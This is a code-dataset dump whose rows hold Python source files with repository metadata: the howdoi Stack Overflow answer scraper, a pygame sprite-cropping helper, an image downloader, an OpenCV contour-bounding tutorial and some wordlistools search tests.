hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fbec81afde982744129ed62c3d44a6236c5b5a8e
| 27,523
|
py
|
Python
|
howdoi/howdoi.py
|
benjaminhafen/howdoi
|
875983c9ebdf4a1c9abad7afd63a68a9229e8eed
|
[
"MIT"
] | null | null | null |
howdoi/howdoi.py
|
benjaminhafen/howdoi
|
875983c9ebdf4a1c9abad7afd63a68a9229e8eed
|
[
"MIT"
] | null | null | null |
howdoi/howdoi.py
|
benjaminhafen/howdoi
|
875983c9ebdf4a1c9abad7afd63a68a9229e8eed
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
######################################################
#
# howdoi - instant coding answers via the command line
# written by Benjamin Gleitzman (gleitz@mit.edu)
# inspired by Rich Jones (rich@anomos.info)
#
######################################################
import gc
gc.disable()
import argparse
import inspect
import json
import os
import re
import sys
import textwrap
from urllib.request import getproxies
from urllib.parse import quote as url_quote, urlparse, parse_qs
from multiprocessing import Pool
import logging
import appdirs
import requests
from cachelib import FileSystemCache, NullCache
from keep import utils as keep_utils
from pygments import highlight
from pygments.lexers import guess_lexer, get_lexer_by_name
from pygments.formatters.terminal import TerminalFormatter
from pygments.util import ClassNotFound
from pyquery import PyQuery as pq
from requests.exceptions import ConnectionError as RequestsConnectionError
from requests.exceptions import SSLError
from howdoi import __version__
from howdoi.errors import GoogleValidationError, BingValidationError, DDGValidationError
logging.basicConfig(format='%(levelname)s: %(message)s')
if os.getenv('HOWDOI_DISABLE_SSL'): # Set http instead of https
SCHEME = 'http://'
VERIFY_SSL_CERTIFICATE = False
else:
SCHEME = 'https://'
VERIFY_SSL_CERTIFICATE = True
SUPPORTED_SEARCH_ENGINES = ('google', 'bing', 'duckduckgo')
URL = os.getenv('HOWDOI_URL') or 'stackoverflow.com'
USER_AGENTS = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100 101 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',
('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) '
'Chrome/19.0.1084.46 Safari/536.5'),
('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46'
'Safari/536.5'),)
SEARCH_URLS = {
'bing': SCHEME + 'www.bing.com/search?q=site:{0}%20{1}&hl=en',
'google': SCHEME + 'www.google.com/search?q=site:{0}%20{1}&hl=en',
'duckduckgo': SCHEME + 'duckduckgo.com/html?q=site:{0}%20{1}&t=hj&ia=web'
}
BLOCK_INDICATORS = (
'form id="captcha-form"',
'This page appears when Google automatically detects requests coming from your computer '
'network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service'
)
BLOCKED_QUESTION_FRAGMENTS = (
'webcache.googleusercontent.com',
)
STAR_HEADER = '\u2605'
ANSWER_HEADER = '{2} Answer from {0} {2}\n{1}'
NO_ANSWER_MSG = '< no answer given >'
CACHE_EMPTY_VAL = "NULL"
CACHE_DIR = appdirs.user_cache_dir('howdoi')
CACHE_ENTRY_MAX = 128
HTML_CACHE_PATH = 'page_cache'
SUPPORTED_HELP_QUERIES = ['use howdoi', 'howdoi', 'run howdoi', 'setup howdoi',
'do howdoi', 'howdoi howdoi', 'howdoi use howdoi']
# variables for text formatting, prepend to string to begin text formatting.
BOLD = '\033[1m'
GREEN = '\033[92m'
RED = '\033[91m'
UNDERLINE = '\033[4m'
END_FORMAT = '\033[0m' # append to string to end text formatting.
# stash options
STASH_SAVE = 'save'
STASH_VIEW = 'view'
STASH_REMOVE = 'remove'
STASH_EMPTY = 'empty'
BLOCKED_ENGINES = []
if os.getenv('HOWDOI_DISABLE_CACHE'):
# works like an always empty cache
cache = NullCache()
else:
cache = FileSystemCache(CACHE_DIR, CACHE_ENTRY_MAX, default_timeout=0)
howdoi_session = requests.session()
class BlockError(RuntimeError):
pass
class IntRange:
def __init__(self, imin=None, imax=None):
self.imin = imin
self.imax = imax
def __call__(self, arg):
try:
value = int(arg)
except ValueError as value_error:
raise self.exception() from value_error
if (self.imin is not None and value < self.imin) or (self.imax is not None and value > self.imax):
raise self.exception()
return value
def exception(self):
if self.imin is not None and self.imax is not None:
return argparse.ArgumentTypeError(f'Must be an integer in the range [{self.imin}, {self.imax}]')
if self.imin is not None:
return argparse.ArgumentTypeError(f'Must be an integer >= {self.imin}')
if self.imax is not None:
return argparse.ArgumentTypeError(f'Must be an integer <= {self.imax}')
return argparse.ArgumentTypeError('Must be an integer')
def _random_int(width):
bres = os.urandom(width)
if sys.version < '3':
ires = int(bres.encode('hex'), 16)
else:
ires = int.from_bytes(bres, 'little')
return ires
def _random_choice(seq):
return seq[_random_int(1) % len(seq)]
def get_proxies():
proxies = getproxies()
filtered_proxies = {}
for key, value in proxies.items():
if key.startswith('http'):
if not value.startswith('http'):
filtered_proxies[key] = 'http://%s' % value
else:
filtered_proxies[key] = value
return filtered_proxies
def _format_url_to_filename(url, file_ext='html'):
filename = ''.join(ch for ch in url if ch.isalnum())
return filename + '.' + file_ext
def _get_result(url):
try:
resp = howdoi_session.get(url, headers={'User-Agent': _random_choice(USER_AGENTS)},
proxies=get_proxies(),
verify=VERIFY_SSL_CERTIFICATE,
cookies={'CONSENT': 'YES+US.en+20170717-00-0'})
resp.raise_for_status()
return resp.text
except requests.exceptions.SSLError as error:
logging.error('%sEncountered an SSL Error. Try using HTTP instead of '
'HTTPS by setting the environment variable "HOWDOI_DISABLE_SSL".\n%s', RED, END_FORMAT)
raise error
def _get_from_cache(cache_key):
# As of cachelib 0.3.0, it internally logging a warning on cache miss
current_log_level = logging.getLogger().getEffectiveLevel()
# Reduce the log level so the warning is not printed
logging.getLogger().setLevel(logging.ERROR)
page = cache.get(cache_key) # pylint: disable=assignment-from-none
# Restore the log level
logging.getLogger().setLevel(current_log_level)
return page
def _add_links_to_text(element):
hyperlinks = element.find('a')
for hyperlink in hyperlinks:
pquery_object = pq(hyperlink)
href = hyperlink.attrib['href']
copy = pquery_object.text()
if copy == href:
replacement = copy
else:
replacement = f'[{copy}]({href})'
pquery_object.replace_with(replacement)
def get_text(element):
''' return inner text in pyquery element '''
_add_links_to_text(element)
try:
return element.text(squash_space=False)
except TypeError:
return element.text()
def _extract_links_from_bing(html):
html.remove_namespaces()
return [a.attrib['href'] for a in html('.b_algo')('h2')('a')]
def _clean_google_link(link):
if '/url?' in link:
parsed_link = urlparse(link)
query_params = parse_qs(parsed_link.query)
url_params = query_params.get('q', []) or query_params.get('url', [])
if url_params:
return url_params[0]
return link
def _extract_links_from_google(query_object):
html = query_object.html()
link_pattern = re.compile(fr"https?://{URL}/questions/[0-9]*/[a-z0-9-]*")
links = link_pattern.findall(html)
links = [_clean_google_link(link) for link in links]
return links
def _extract_links_from_duckduckgo(html):
html.remove_namespaces()
links_anchors = html.find('a.result__a')
results = []
for anchor in links_anchors:
link = anchor.attrib['href']
url_obj = urlparse(link)
parsed_url = parse_qs(url_obj.query).get('uddg', '')
if parsed_url:
results.append(parsed_url[0])
return results
def _extract_links(html, search_engine):
if search_engine == 'bing':
return _extract_links_from_bing(html)
if search_engine == 'duckduckgo':
return _extract_links_from_duckduckgo(html)
return _extract_links_from_google(html)
def _get_search_url(search_engine):
return SEARCH_URLS.get(search_engine, SEARCH_URLS['google'])
def _is_blocked(page):
for indicator in BLOCK_INDICATORS:
if page.find(indicator) != -1:
return True
return False
def _get_links(query):
search_engine = os.getenv('HOWDOI_SEARCH_ENGINE', 'google')
search_url = _get_search_url(search_engine).format(URL, url_quote(query))
logging.info('Searching %s with URL: %s', search_engine, search_url)
try:
result = _get_result(search_url)
except requests.HTTPError:
logging.info('Received HTTPError')
result = None
if not result or _is_blocked(result):
logging.error('%sUnable to find an answer because the search engine temporarily blocked the request. '
'Attempting to use a different search engine.%s', RED, END_FORMAT)
raise BlockError('Temporary block by search engine')
html = pq(result)
links = _extract_links(html, search_engine)
if len(links) == 0:
logging.info('Search engine %s found no StackOverflow links, returned HTML is:', search_engine)
logging.info(result)
return list(dict.fromkeys(links)) # remove any duplicates
def get_link_at_pos(links, position):
if not links:
return False
if len(links) >= position:
link = links[position - 1]
else:
link = links[-1]
return link
def _format_output(args, code):
if not args['color']:
return code
lexer = None
# try to find a lexer using the StackOverflow tags
# or the query arguments
for keyword in args['query'].split() + args['tags']:
try:
lexer = get_lexer_by_name(keyword)
break
except ClassNotFound:
pass
# no lexer found above, use the guesser
if not lexer:
try:
lexer = guess_lexer(code)
except ClassNotFound:
return code
return highlight(code,
lexer,
TerminalFormatter(bg='dark'))
def _is_question(link):
for fragment in BLOCKED_QUESTION_FRAGMENTS:
if fragment in link:
return False
return re.search(r'questions/\d+/', link)
def _get_questions(links):
return [link for link in links if _is_question(link)]
def _get_answer(args, link): # pylint: disable=too-many-branches
cache_key = _get_cache_key(link)
page = _get_from_cache(cache_key)
if not page:
logging.info('Fetching page: %s', link)
page = _get_result(link + '?answertab=votes')
cache.set(cache_key, page)
else:
logging.info('Using cached page: %s', link)
html = pq(page)
first_answer = html('.answercell').eq(0) or html('.answer').eq(0)
instructions = first_answer.find('pre') or first_answer.find('code')
args['tags'] = [t.text for t in html('.post-tag')]
# make decision on answer body class.
if first_answer.find(".js-post-body"):
answer_body_cls = ".js-post-body"
else:
# rollback to post-text class
answer_body_cls = ".post-text"
if not instructions and not args['all']:
logging.info('No code sample found, returning entire answer')
text = get_text(first_answer.find(answer_body_cls).eq(0))
elif args['all']:
logging.info('Returning entire answer')
texts = []
for html_tag in first_answer.items(f'{answer_body_cls} > *'):
current_text = get_text(html_tag)
if current_text:
if html_tag[0].tag in ['pre', 'code']:
texts.append(_format_output(args, current_text))
else:
texts.append(current_text)
text = '\n'.join(texts)
else:
text = _format_output(args, get_text(instructions.eq(0)))
if text is None:
logging.info('%sAnswer was empty%s', RED, END_FORMAT)
text = NO_ANSWER_MSG
text = text.strip()
return text
def _get_links_with_cache(query):
cache_key = _get_cache_key(query)
res = _get_from_cache(cache_key)
if res:
logging.info('Using cached links')
if res == CACHE_EMPTY_VAL:
logging.info('No StackOverflow links found in cached search engine results - will make live query')
else:
return res
links = _get_links(query)
if not links:
cache.set(cache_key, CACHE_EMPTY_VAL)
question_links = _get_questions(links)
cache.set(cache_key, question_links or CACHE_EMPTY_VAL)
return question_links
def build_splitter(splitter_character='=', splitter_length=80):
return '\n' + splitter_character * splitter_length + '\n\n'
def _get_answers(args):
"""
@args: command-line arguments
returns: array of answers and their respective metadata
False if unable to get answers
"""
question_links = _get_links_with_cache(args['query'])
if not question_links:
return False
initial_pos = args['pos'] - 1
final_pos = initial_pos + args['num_answers']
question_links = question_links[initial_pos:final_pos]
search_engine = os.getenv('HOWDOI_SEARCH_ENGINE', 'google')
logging.info('%s links found on %s: %s', URL, search_engine, len(question_links))
logging.info('Answers requested: %s, Starting at position: %s', args["num_answers"], args['pos'])
with Pool() as pool:
answers = pool.starmap(
_get_answer_worker,
[(args, link) for link in question_links]
)
for idx, _ in enumerate(answers):
answers[idx]['position'] = idx + 1
logging.info('Total answers returned: %s', len(answers))
return answers
def _get_answer_worker(args, link):
answer = _get_answer(args, link)
result = {
'answer': None,
'link': None,
'position': None
}
multiple_answers = (args['num_answers'] > 1 or args['all'])
if not answer:
return result
if not args['link'] and not args['json_output'] and multiple_answers:
answer = ANSWER_HEADER.format(link, answer, STAR_HEADER)
answer += '\n'
result['answer'] = answer
result['link'] = link
return result
def _clear_cache():
global cache # pylint: disable=global-statement,invalid-name
if not cache:
cache = FileSystemCache(CACHE_DIR, CACHE_ENTRY_MAX, 0)
return cache.clear()
def _is_help_query(query):
return any(query.lower() == help_query for help_query in SUPPORTED_HELP_QUERIES)
def _format_answers(args, res):
if "error" in res:
return f'ERROR: {RED}{res["error"]}{END_FORMAT}'
if args["json_output"]:
return json.dumps(res)
formatted_answers = []
for answer in res:
next_ans = answer["answer"]
if args["link"]: # if we only want links
next_ans = answer["link"]
formatted_answers.append(next_ans)
return build_splitter().join(formatted_answers)
def _get_help_instructions():
instruction_splitter = build_splitter(' ', 60)
query = 'print hello world in python'
instructions = [
'Here are a few popular howdoi commands ',
'>>> howdoi {} (default query)',
'>>> howdoi {} -a (read entire answer)',
'>>> howdoi {} -n [number] (retrieve n number of answers)',
'>>> howdoi {} -l (display only a link to where the answer is from',
'>>> howdoi {} -c (Add colors to the output)',
'>>> howdoi {} -e (Specify the search engine you want to use e.g google,bing)'
]
instructions = map(lambda s: s.format(query), instructions)
return instruction_splitter.join(instructions)
def _get_cache_key(args):
frame = inspect.currentframe()
calling_func = inspect.getouterframes(frame)[1].function
return calling_func + str(args) + __version__
def format_stash_item(fields, index=-1):
title = fields['alias']
description = fields['desc']
item_num = index + 1
if index == -1:
return f'{UNDERLINE}{BOLD}$ {title}{END_FORMAT}\n\n{description}\n'
return f'{UNDERLINE}{BOLD}$ [{item_num}] {title}{END_FORMAT}\n\n{description}\n'
def print_stash(stash_list=None):
if not stash_list or len(stash_list) == 0:
stash_list = ['\nSTASH LIST:']
commands = keep_utils.read_commands()
if commands is None or len(commands.items()) == 0:
logging.error('%sNo commands found in stash. '
'Add a command with "howdoi --%s <query>".%s', RED, STASH_SAVE, END_FORMAT)
return
for _, fields in commands.items():
stash_list.append(format_stash_item(fields))
else:
stash_list = [format_stash_item(x['fields'], i) for i, x in enumerate(stash_list)]
print(build_splitter('#').join(stash_list))
def _get_stash_key(args):
stash_args = {}
ignore_keys = [STASH_SAVE, STASH_VIEW, STASH_REMOVE, STASH_EMPTY, 'tags'] # ignore these for stash key
for key in args:
if key not in ignore_keys:
stash_args[key] = args[key]
return str(stash_args)
def _stash_remove(cmd_key, title):
commands = keep_utils.read_commands()
if commands is not None and cmd_key in commands:
keep_utils.remove_command(cmd_key)
print(f'\n{BOLD}{GREEN}"{title}" removed from stash{END_FORMAT}\n')
else:
print(f'\n{BOLD}{RED}"{title}" not found in stash{END_FORMAT}\n')
def _stash_save(cmd_key, title, answer):
try:
keep_utils.save_command(cmd_key, answer, title)
except FileNotFoundError:
os.system('keep init')
keep_utils.save_command(cmd_key, answer, title)
finally:
print_stash()
def _parse_cmd(args, res):
answer = _format_answers(args, res)
cmd_key = _get_stash_key(args)
title = ''.join(args['query'])
if args[STASH_SAVE]:
_stash_save(cmd_key, title, answer)
return ''
if args[STASH_REMOVE]:
_stash_remove(cmd_key, title)
return ''
return answer
def howdoi(raw_query):
if isinstance(raw_query, str): # you can pass either a raw or a parsed query
parser = get_parser()
args = vars(parser.parse_args(raw_query.split(' ')))
else:
args = raw_query
search_engine = args['search_engine'] or os.getenv('HOWDOI_SEARCH_ENGINE') or 'google'
os.environ['HOWDOI_SEARCH_ENGINE'] = search_engine
if search_engine not in SUPPORTED_SEARCH_ENGINES:
supported_search_engines = ', '.join(SUPPORTED_SEARCH_ENGINES)
message = f'Unsupported engine {search_engine}. The supported engines are: {supported_search_engines}'
res = {'error': message}
return _parse_cmd(args, res)
args['query'] = ' '.join(args['query']).replace('?', '')
cache_key = _get_cache_key(args)
if _is_help_query(args['query']):
return _get_help_instructions() + '\n'
res = _get_from_cache(cache_key)
if res:
logging.info('Using cached response (add -C to clear the cache)')
return _parse_cmd(args, res)
logging.info('Fetching answers for query: %s', args["query"])
try:
res = _get_answers(args)
if not res:
message = 'Sorry, couldn\'t find any help with that topic'
if not args['explain']:
message = f'{message} (use --explain to learn why)'
res = {'error': message}
cache.set(cache_key, res)
except (RequestsConnectionError, SSLError):
res = {'error': f'Unable to reach {search_engine}. Do you need to use a proxy?\n'}
except BlockError:
BLOCKED_ENGINES.append(search_engine)
next_engine = next((engine for engine in SUPPORTED_SEARCH_ENGINES if engine not in BLOCKED_ENGINES), None)
if next_engine is None:
res = {'error': 'Unable to get a response from any search engine\n'}
else:
args['search_engine'] = next_engine
args['query'] = args['query'].split()
logging.info('%sRetrying search with %s%s', GREEN, next_engine, END_FORMAT)
return howdoi(args)
return _parse_cmd(args, res)
def get_parser():
parser = argparse.ArgumentParser(description='instant coding answers via the command line',
epilog=textwrap.dedent('''\
environment variable examples:
HOWDOI_COLORIZE=1
HOWDOI_DISABLE_CACHE=1
HOWDOI_DISABLE_SSL=1
HOWDOI_SEARCH_ENGINE=google
HOWDOI_URL=serverfault.com
'''),
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('query', metavar='QUERY', type=str, nargs='*', help='the question to answer')
parser.add_argument('-p', '--pos', help='select answer in specified position (default: 1)',
default=1, type=IntRange(1, 20), metavar='POS')
parser.add_argument('-n', '--num', help='number of answers to return (default: 1)',
dest='num_answers', default=1, type=IntRange(1, 20), metavar='NUM')
parser.add_argument('--num-answers', help=argparse.SUPPRESS)
parser.add_argument('-a', '--all', help='display the full text of the answer', action='store_true')
parser.add_argument('-l', '--link', help='display only the answer link', action='store_true')
parser.add_argument('-c', '--color', help='enable colorized output', action='store_true')
parser.add_argument('-x', '--explain', help='explain how answer was chosen', action='store_true')
parser.add_argument('-C', '--clear-cache', help='clear the cache',
action='store_true')
parser.add_argument('-j', '--json', help='return answers in raw json format', dest='json_output',
action='store_true')
parser.add_argument('--json-output', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('-v', '--version', help='display the current version of howdoi',
action='store_true')
parser.add_argument('-e', '--engine', help='search engine for this query (google, bing, duckduckgo)',
dest='search_engine', nargs="?", metavar='ENGINE')
parser.add_argument('--save', '--stash', help='stash a howdoi answer',
action='store_true')
parser.add_argument('--view', help='view your stash',
action='store_true')
parser.add_argument('--remove', help='remove an entry in your stash',
action='store_true')
parser.add_argument('--empty', help='empty your stash',
action='store_true')
parser.add_argument('--sanity-check', help=argparse.SUPPRESS,
action='store_true')
return parser
def _sanity_check(engine, test_query=None):
parser = get_parser()
if not test_query:
test_query = 'format date bash'
args = vars(parser.parse_args(test_query.split()))
args['search_engine'] = engine
try:
result = howdoi(args)
# Perhaps better to use `-j` and then check for an error message
# rather than trying to enumerate all the error strings
assert "Sorry" not in result and "Unable to" not in result
except AssertionError as exc:
if engine == 'google':
raise GoogleValidationError from exc
if engine == 'bing':
raise BingValidationError from exc
raise DDGValidationError from exc
def prompt_stash_remove(args, stash_list, view_stash=True):
if view_stash:
print_stash(stash_list)
last_index = len(stash_list)
prompt = f'{BOLD}> Select a stash command to remove [1-{last_index}] (0 to cancel): {END_FORMAT}'
user_input = input(prompt)
try:
user_input = int(user_input)
if user_input == 0:
return
if user_input < 1 or user_input > last_index:
logging.error('\n%sInput index is invalid.%s', RED, END_FORMAT)
prompt_stash_remove(args, stash_list, False)
return
cmd = stash_list[user_input - 1]
cmd_key = cmd['command']
cmd_name = cmd['fields']['alias']
_stash_remove(cmd_key, cmd_name)
return
except ValueError:
logging.error('\n%sInvalid input. Must specify index of command.%s', RED, END_FORMAT)
prompt_stash_remove(args, stash_list, False)
return
def perform_sanity_check():
'''Perform sanity check.
Returns exit code for program. An exit code of -1 means a validation error was encountered.
'''
global cache # pylint: disable=global-statement,invalid-name
# Disable cache to avoid cached answers while performing the checks
cache = NullCache()
exit_code = 0
for engine in ['google']: # 'bing' and 'duckduckgo' throw various block errors
print('Checking {}...'.format(engine))
try:
_sanity_check(engine)
except (GoogleValidationError, BingValidationError, DDGValidationError):
logging.error('%s%s query failed%s', RED, engine, END_FORMAT)
exit_code = -1
if exit_code == 0:
print(f'{GREEN}Ok{END_FORMAT}')
return exit_code
def command_line_runner(): # pylint: disable=too-many-return-statements,too-many-branches
parser = get_parser()
args = vars(parser.parse_args())
if args['version']:
print(__version__)
return
if args['explain']:
logging.getLogger().setLevel(logging.INFO)
logging.info('Version: %s', __version__)
if args['sanity_check']:
sys.exit(
perform_sanity_check()
)
if args['clear_cache']:
if _clear_cache():
print(f'{GREEN}Cache cleared successfully{END_FORMAT}')
else:
logging.error('%sClearing cache failed%s', RED, END_FORMAT)
if args[STASH_VIEW]:
print_stash()
return
if args[STASH_EMPTY]:
os.system('keep init')
return
if args[STASH_REMOVE] and len(args['query']) == 0:
commands = keep_utils.read_commands()
if commands is None or len(commands.items()) == 0:
logging.error('%sNo commands found in stash. '
'Add a command with "howdoi --%s <query>".%s', RED, STASH_SAVE, END_FORMAT)
return
stash_list = [{'command': cmd, 'fields': field} for cmd, field in commands.items()]
prompt_stash_remove(args, stash_list)
return
if not args['query']:
parser.print_help()
return
if os.getenv('HOWDOI_COLORIZE'):
args['color'] = True
utf8_result = howdoi(args).encode('utf-8', 'ignore')
if sys.version < '3':
print(utf8_result)
else:
# Write UTF-8 to stdout: https://stackoverflow.com/a/3603160
sys.stdout.buffer.write(utf8_result)
# close the session to release connection
howdoi_session.close()
if __name__ == '__main__':
command_line_runner()
| 33.482968
| 114
| 0.63427
|
ea011e19b2599a0908c90f899ef22072c3691713
| 719
|
py
|
Python
|
Libreria/recorte.py
|
Sannso/GameCG2
|
426e22541bf670e0767395c30f15d1b6ad6183f3
|
[
"CC0-1.0"
] | null | null | null |
Libreria/recorte.py
|
Sannso/GameCG2
|
426e22541bf670e0767395c30f15d1b6ad6183f3
|
[
"CC0-1.0"
] | null | null | null |
Libreria/recorte.py
|
Sannso/GameCG2
|
426e22541bf670e0767395c30f15d1b6ad6183f3
|
[
"CC0-1.0"
] | null | null | null |
import pygame
import configparser
animapersonaje = []
def recortar_imagen(nombre_imagen, ancho_imagen,alto_imagen,fila_):
terreno = pygame.image.load(nombre_imagen)
info = terreno.get_rect()
ancho_pixeles = info[2]
alto_pixeles = info[3]
ancho_patron = ancho_pixeles/ancho_imagen
alto_patron = alto_pixeles/alto_imagen
#parametros subsurface: posicion x, posicion y, ancho corte (ancho patron), alto corte(alto patron)
for fila in range(alto_imagen):
animapersonaje.append([])
for col in range(ancho_imagen):
cuadro = terreno.subsurface(ancho_patron*col, alto_patron*fila, ancho_patron, alto_patron)
animapersonaje[fila_].append(cuadro)
| 29.958333
| 104
| 0.720445
|
56e22ee1d2812f1881aa3e2ef41f1be3c41d20e3
| 420
|
py
|
Python
|
utils/image_downloader.py
|
louismeunier/school-disct-bot-v2
|
e6c225e6883b6a820df5f290cae6d5c01edcae46
|
[
"MIT"
] | null | null | null |
utils/image_downloader.py
|
louismeunier/school-disct-bot-v2
|
e6c225e6883b6a820df5f290cae6d5c01edcae46
|
[
"MIT"
] | null | null | null |
utils/image_downloader.py
|
louismeunier/school-disct-bot-v2
|
e6c225e6883b6a820df5f290cae6d5c01edcae46
|
[
"MIT"
] | null | null | null |
import requests
import shutil
def download(url,name):
"""
This function was almost ENTIRELY "copied" from
https://towardsdatascience.com/how-to-download-an-image-using-python-38a75cfa21c
"""
r=requests.get(url,stream=True)
if r.status_code==200:
r.raw.decode_content=True
with open(f"utils/resources/images/schedules/{name}.png", "wb") as f:
shutil.copyfileobj(r.raw,f)
return True
else:
return False
| 26.25
| 81
| 0.742857
|
0ae261a4ebe4c6f01f6c6e4cff9c57b1bfde5b6f
| 94
|
py
|
Python
|
samanage/__init__.py
|
rodneymandap/samanage-py
|
9e06b363e2fa43b3e8f92f97aa3975e1f0461a56
|
[
"MIT"
] | null | null | null |
samanage/__init__.py
|
rodneymandap/samanage-py
|
9e06b363e2fa43b3e8f92f97aa3975e1f0461a56
|
[
"MIT"
] | null | null | null |
samanage/__init__.py
|
rodneymandap/samanage-py
|
9e06b363e2fa43b3e8f92f97aa3975e1f0461a56
|
[
"MIT"
] | 1
|
2022-01-25T21:40:48.000Z
|
2022-01-25T21:40:48.000Z
|
"""
A simple python library to interact with Samanage API.
"""
from .samanage import Samanage
| 18.8
| 54
| 0.755319
|
0ebab7aa22b7295e680c8a5a13e536e63fd32d87
| 2,528
|
py
|
Python
|
opencv/sources/samples/python/tutorial_code/ShapeDescriptors/bounding_rotated_ellipses/generalContours_demo2.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
opencv/sources/samples/python/tutorial_code/ShapeDescriptors/bounding_rotated_ellipses/generalContours_demo2.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
opencv/sources/samples/python/tutorial_code/ShapeDescriptors/bounding_rotated_ellipses/generalContours_demo2.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import cv2 as cv
import numpy as np
import argparse
import random as rng
rng.seed(12345)
def thresh_callback(val):
threshold = val
## [Canny]
# Detect edges using Canny
canny_output = cv.Canny(src_gray, threshold, threshold * 2)
## [Canny]
## [findContours]
# Find contours
contours, _ = cv.findContours(canny_output, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)
## [findContours]
# Find the rotated rectangles and ellipses for each contour
minRect = [None]*len(contours)
minEllipse = [None]*len(contours)
for i, c in enumerate(contours):
minRect[i] = cv.minAreaRect(c)
if c.shape[0] > 5:
minEllipse[i] = cv.fitEllipse(c)
# Draw contours + rotated rects + ellipses
## [zeroMat]
drawing = np.zeros((canny_output.shape[0], canny_output.shape[1], 3), dtype=np.uint8)
## [zeroMat]
## [forContour]
for i, c in enumerate(contours):
color = (rng.randint(0,256), rng.randint(0,256), rng.randint(0,256))
# contour
cv.drawContours(drawing, contours, i, color)
# ellipse
if c.shape[0] > 5:
cv.ellipse(drawing, minEllipse[i], color, 2)
# rotated rectangle
box = cv.boxPoints(minRect[i])
box = np.intp(box) #np.intp: Integer used for indexing (same as C ssize_t; normally either int32 or int64)
cv.drawContours(drawing, [box], 0, color)
## [forContour]
## [showDrawings]
# Show in a window
cv.imshow('Contours', drawing)
## [showDrawings]
## [setup]
# Load source image
parser = argparse.ArgumentParser(description='Code for Creating Bounding rotated boxes and ellipses for contours tutorial.')
parser.add_argument('--input', help='Path to input image.', default='stuff.jpg')
args = parser.parse_args()
src = cv.imread(cv.samples.findFile(args.input))
if src is None:
print('Could not open or find the image:', args.input)
exit(0)
# Convert image to gray and blur it
src_gray = cv.cvtColor(src, cv.COLOR_BGR2GRAY)
src_gray = cv.blur(src_gray, (3,3))
## [setup]
## [createWindow]
# Create Window
source_window = 'Source'
cv.namedWindow(source_window)
cv.imshow(source_window, src)
## [createWindow]
## [trackbar]
max_thresh = 255
thresh = 100 # initial threshold
cv.createTrackbar('Canny Thresh:', source_window, thresh, max_thresh, thresh_callback)
thresh_callback(thresh)
## [trackbar]
cv.waitKey()
| 30.457831
| 125
| 0.649525
|
4562dc3a95851a278fb188725cb2033198ca85c1
| 1,885
|
py
|
Python
|
tests/test_tools/test_search.py
|
Nazime/wordlistools
|
f18fb0dbfa6e4950e090299d99a173ac96514f42
|
[
"MIT"
] | 17
|
2022-02-06T21:23:27.000Z
|
2022-02-07T22:33:40.000Z
|
tests/test_tools/test_search.py
|
Nazime/wordlistools
|
f18fb0dbfa6e4950e090299d99a173ac96514f42
|
[
"MIT"
] | 1
|
2022-02-06T21:52:30.000Z
|
2022-02-06T21:52:30.000Z
|
tests/test_tools/test_search.py
|
Nazime/wordlistools
|
f18fb0dbfa6e4950e090299d99a173ac96514f42
|
[
"MIT"
] | 2
|
2022-02-06T21:29:42.000Z
|
2022-02-06T21:31:06.000Z
|
from wordlistools.helpertest import AsStdinWordlist, AsWordlist, PolyArgument, runtest
from wordlistools.plugins import red
def test_color_false():
# By default color is enabled in cmdline and disabled in API
color_arg_false = PolyArgument(
api_key="color", api_value=False, cmd_args=["--color", "no"]
)
runtest(
"search",
args=("a", AsStdinWordlist(["a", "b"]), color_arg_false),
ret=AsWordlist(["a"]),
)
runtest(
"search",
args=(
"a",
AsStdinWordlist(["alpha", "beta", "gama", "omega"]),
color_arg_false,
),
ret=AsWordlist(["alpha", "beta", "gama", "omega"]),
)
runtest(
"search",
args=("bc", AsStdinWordlist(["abc", "xbc", "eff", "bxc"]), color_arg_false),
ret=AsWordlist(["abc", "xbc"]),
)
# TODO: test multiple wordlist
def test_color_true():
for cmd_args in (["--color", "yes"], ["--color"]):
color_arg_true = PolyArgument(
api_key="color", api_value=True, cmd_args=cmd_args
)
runtest(
"search",
args=("a", AsStdinWordlist(["a", "b"]), color_arg_true),
ret=AsWordlist([red("a")]),
)
